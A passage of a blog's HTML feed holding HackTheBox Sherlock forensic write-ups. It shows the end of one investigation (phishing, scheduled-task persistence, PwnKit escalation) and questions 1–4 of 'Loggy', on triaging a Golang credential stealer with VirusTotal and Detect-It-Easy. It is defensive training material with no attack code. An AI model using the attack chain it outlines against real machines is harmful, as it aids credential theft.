data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZQ3M!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf02c0b1-c9af-4260-820c-24a7f3423185_1380x450.png 424w, https://substackcdn.com/image/fetch/$s_!ZQ3M!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf02c0b1-c9af-4260-820c-24a7f3423185_1380x450.png 848w, https://substackcdn.com/image/fetch/$s_!ZQ3M!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf02c0b1-c9af-4260-820c-24a7f3423185_1380x450.png 1272w, https://substackcdn.com/image/fetch/$s_!ZQ3M!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf02c0b1-c9af-4260-820c-24a7f3423185_1380x450.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZQ3M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf02c0b1-c9af-4260-820c-24a7f3423185_1380x450.png" width="1380" height="450" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/df02c0b1-c9af-4260-820c-24a7f3423185_1380x450.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:450,&quot;width&quot;:1380,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZQ3M!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf02c0b1-c9af-4260-820c-24a7f3423185_1380x450.png 424w, https://substackcdn.com/image/fetch/$s_!ZQ3M!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf02c0b1-c9af-4260-820c-24a7f3423185_1380x450.png 848w, https://substackcdn.com/image/fetch/$s_!ZQ3M!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf02c0b1-c9af-4260-820c-24a7f3423185_1380x450.png 1272w, https://substackcdn.com/image/fetch/$s_!ZQ3M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf02c0b1-c9af-4260-820c-24a7f3423185_1380x450.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>22. What is the payload type?</strong></p><p>Using the hint and running the downloaded exe against a threat detection tool confirms the payload type.</p><p><strong>23. What task name was added by the attacker?</strong></p><p>Checking C:\Windows\System32\Tasks uncovers the malicious scheduled task name.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!TXO2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2274221b-3395-4af5-a547-400b108b1825_1106x218.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!TXO2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2274221b-3395-4af5-a547-400b108b1825_1106x218.png 424w, https://substackcdn.com/image/fetch/$s_!TXO2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2274221b-3395-4af5-a547-400b108b1825_1106x218.png 848w, https://substackcdn.com/image/fetch/$s_!TXO2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2274221b-3395-4af5-a547-400b108b1825_1106x218.png 1272w, https://substackcdn.com/image/fetch/$s_!TXO2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2274221b-3395-4af5-a547-400b108b1825_1106x218.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!TXO2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2274221b-3395-4af5-a547-400b108b1825_1106x218.png" width="1106" height="218" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2274221b-3395-4af5-a547-400b108b1825_1106x218.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:218,&quot;width&quot;:1106,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!TXO2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2274221b-3395-4af5-a547-400b108b1825_1106x218.png 424w, https://substackcdn.com/image/fetch/$s_!TXO2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2274221b-3395-4af5-a547-400b108b1825_1106x218.png 848w, https://substackcdn.com/image/fetch/$s_!TXO2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2274221b-3395-4af5-a547-400b108b1825_1106x218.png 1272w, https://substackcdn.com/image/fetch/$s_!TXO2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2274221b-3395-4af5-a547-400b108b1825_1106x218.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Conclusion</strong></p><p>This forensic investigation uncovers the attacker&#8217;s footprint, from initial access via phishing to persistence through scheduled tasks and privilege escalation via PwnKit. NetworkMiner, Wireshark, Timeline Explorer, and CyberChef were key in uncovering evidence and answering critical questions about the attack.</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Loggy]]></title><description><![CDATA[Sherlock]]></description><link>https://www.byteberzerker.com/p/hackthebox-loggy</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-loggy</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Wed, 22 Jan 2025 22:43:29 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!q2nv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3c29de8-ae43-4132-b4eb-08b64bb72784_1376x747.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>HackTheBox: Loggy Write-Up</strong></p><p><strong>Scenario:</strong></p><p>Janice from accounting was informed by the SOC that her work credentials were discovered on the dark web by the threat intelligence team. Files recovered from her machine were analyzed to understand the situation better.</p><p><strong>Questions and Answers:</strong></p><p><strong>1. What is the SHA-256 hash of this malware binary?</strong></p><ul><li><p><strong>Solution</strong>: Load the binary into VirusTotal to obtain its SHA-256 hash.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!q2nv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3c29de8-ae43-4132-b4eb-08b64bb72784_1376x747.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!q2nv!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3c29de8-ae43-4132-b4eb-08b64bb72784_1376x747.png 424w, https://substackcdn.com/image/fetch/$s_!q2nv!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3c29de8-ae43-4132-b4eb-08b64bb72784_1376x747.png 848w, https://substackcdn.com/image/fetch/$s_!q2nv!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3c29de8-ae43-4132-b4eb-08b64bb72784_1376x747.png 1272w, https://substackcdn.com/image/fetch/$s_!q2nv!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3c29de8-ae43-4132-b4eb-08b64bb72784_1376x747.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!q2nv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3c29de8-ae43-4132-b4eb-08b64bb72784_1376x747.png" width="1376" height="747" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d3c29de8-ae43-4132-b4eb-08b64bb72784_1376x747.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:747,&quot;width&quot;:1376,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!q2nv!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3c29de8-ae43-4132-b4eb-08b64bb72784_1376x747.png 424w, https://substackcdn.com/image/fetch/$s_!q2nv!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3c29de8-ae43-4132-b4eb-08b64bb72784_1376x747.png 848w, https://substackcdn.com/image/fetch/$s_!q2nv!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3c29de8-ae43-4132-b4eb-08b64bb72784_1376x747.png 1272w, https://substackcdn.com/image/fetch/$s_!q2nv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3c29de8-ae43-4132-b4eb-08b64bb72784_1376x747.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>2. What programming language (and version) is this malware written in?</strong></p><ul><li><p><strong>Approach</strong>: VirusTotal may give initial hints about the programming language but does not provide a definitive answer. Load the binary into <strong>Detect-It-Easy (DIE)</strong> and search strings for "Go" to identify that it was written in <strong>Golang</strong>. Look for the version in the embedded metadata.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!nzCv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27d91076-c39b-4ef5-9db4-95fd47d4e7ce_827x690.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!nzCv!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27d91076-c39b-4ef5-9db4-95fd47d4e7ce_827x690.png 424w, https://substackcdn.com/image/fetch/$s_!nzCv!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27d91076-c39b-4ef5-9db4-95fd47d4e7ce_827x690.png 848w, https://substackcdn.com/image/fetch/$s_!nzCv!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27d91076-c39b-4ef5-9db4-95fd47d4e7ce_827x690.png 1272w, https://substackcdn.com/image/fetch/$s_!nzCv!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27d91076-c39b-4ef5-9db4-95fd47d4e7ce_827x690.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!nzCv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27d91076-c39b-4ef5-9db4-95fd47d4e7ce_827x690.png" width="827" height="690" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/27d91076-c39b-4ef5-9db4-95fd47d4e7ce_827x690.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:690,&quot;width&quot;:827,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!nzCv!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27d91076-c39b-4ef5-9db4-95fd47d4e7ce_827x690.png 424w, https://substackcdn.com/image/fetch/$s_!nzCv!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27d91076-c39b-4ef5-9db4-95fd47d4e7ce_827x690.png 848w, https://substackcdn.com/image/fetch/$s_!nzCv!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27d91076-c39b-4ef5-9db4-95fd47d4e7ce_827x690.png 1272w, https://substackcdn.com/image/fetch/$s_!nzCv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27d91076-c39b-4ef5-9db4-95fd47d4e7ce_827x690.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>3. There are multiple GitHub repos referenced in the static strings. Which GitHub repo would most likely suggest the ability of this malware to exfiltrate data?</strong></p><ul><li><p><strong>Solution</strong>: Use <strong>Detect-It-Easy</strong> to extract strings and search for "github." Analyze the references and identify the repository linked to data exfiltration capabilities.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!xjLn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2549c0d2-66eb-4504-822e-1bead4131206_787x639.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!xjLn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2549c0d2-66eb-4504-822e-1bead4131206_787x639.png 424w, https://substackcdn.com/image/fetch/$s_!xjLn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2549c0d2-66eb-4504-822e-1bead4131206_787x639.png 848w, https://substackcdn.com/image/fetch/$s_!xjLn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2549c0d2-66eb-4504-822e-1bead4131206_787x639.png 1272w, https://substackcdn.com/image/fetch/$s_!xjLn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2549c0d2-66eb-4504-822e-1bead4131206_787x639.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!xjLn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2549c0d2-66eb-4504-822e-1bead4131206_787x639.png" width="787" height="639" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2549c0d2-66eb-4504-822e-1bead4131206_787x639.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:639,&quot;width&quot;:787,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!xjLn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2549c0d2-66eb-4504-822e-1bead4131206_787x639.png 424w, https://substackcdn.com/image/fetch/$s_!xjLn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2549c0d2-66eb-4504-822e-1bead4131206_787x639.png 848w, https://substackcdn.com/image/fetch/$s_!xjLn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2549c0d2-66eb-4504-822e-1bead4131206_787x639.png 1272w, https://substackcdn.com/image/fetch/$s_!xjLn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2549c0d2-66eb-4504-822e-1bead4131206_787x639.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>4. What dependency, expressed as a GitHub repo, supports Janice&#8217;s assertion that she thought she downloaded something that can just take screenshots?</strong></p><ul><li><p><strong>Solution</strong>: Similar to Question 3, extract strings and search for "github." Identify the repository that aligns with screenshot functionality.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!waW1!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4b7c7128-760d-4724-b0c1-41e81abb31bd_788x641.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!waW1!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4b7c7128-760d-4724-b0c1-41e81abb31bd_788x641.png 424w, https://substackcdn.com/image/fetch/$s_!waW1!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4b7c7128-760d-4724-b0c1-41e81abb31bd_788x641.png 848w, https://substackcdn.com/image/fetch/$s_!waW1!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4b7c7128-760d-4724-b0c1-41e81abb31bd_788x641.png 1272w, https://substackcdn.com/image/fetch/$s_!waW1!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4b7c7128-760d-4724-b0c1-41e81abb31bd_788x641.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!waW1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4b7c7128-760d-4724-b0c1-41e81abb31bd_788x641.png" width="788" height="641" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4b7c7128-760d-4724-b0c1-41e81abb31bd_788x641.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:641,&quot;width&quot;:788,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!waW1!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4b7c7128-760d-4724-b0c1-41e81abb31bd_788x641.png 424w, https://substackcdn.com/image/fetch/$s_!waW1!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4b7c7128-760d-4724-b0c1-41e81abb31bd_788x641.png 848w, https://substackcdn.com/image/fetch/$s_!waW1!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4b7c7128-760d-4724-b0c1-41e81abb31bd_788x641.png 1272w, https://substackcdn.com/image/fetch/$s_!waW1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4b7c7128-760d-4724-b0c1-41e81abb31bd_788x641.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 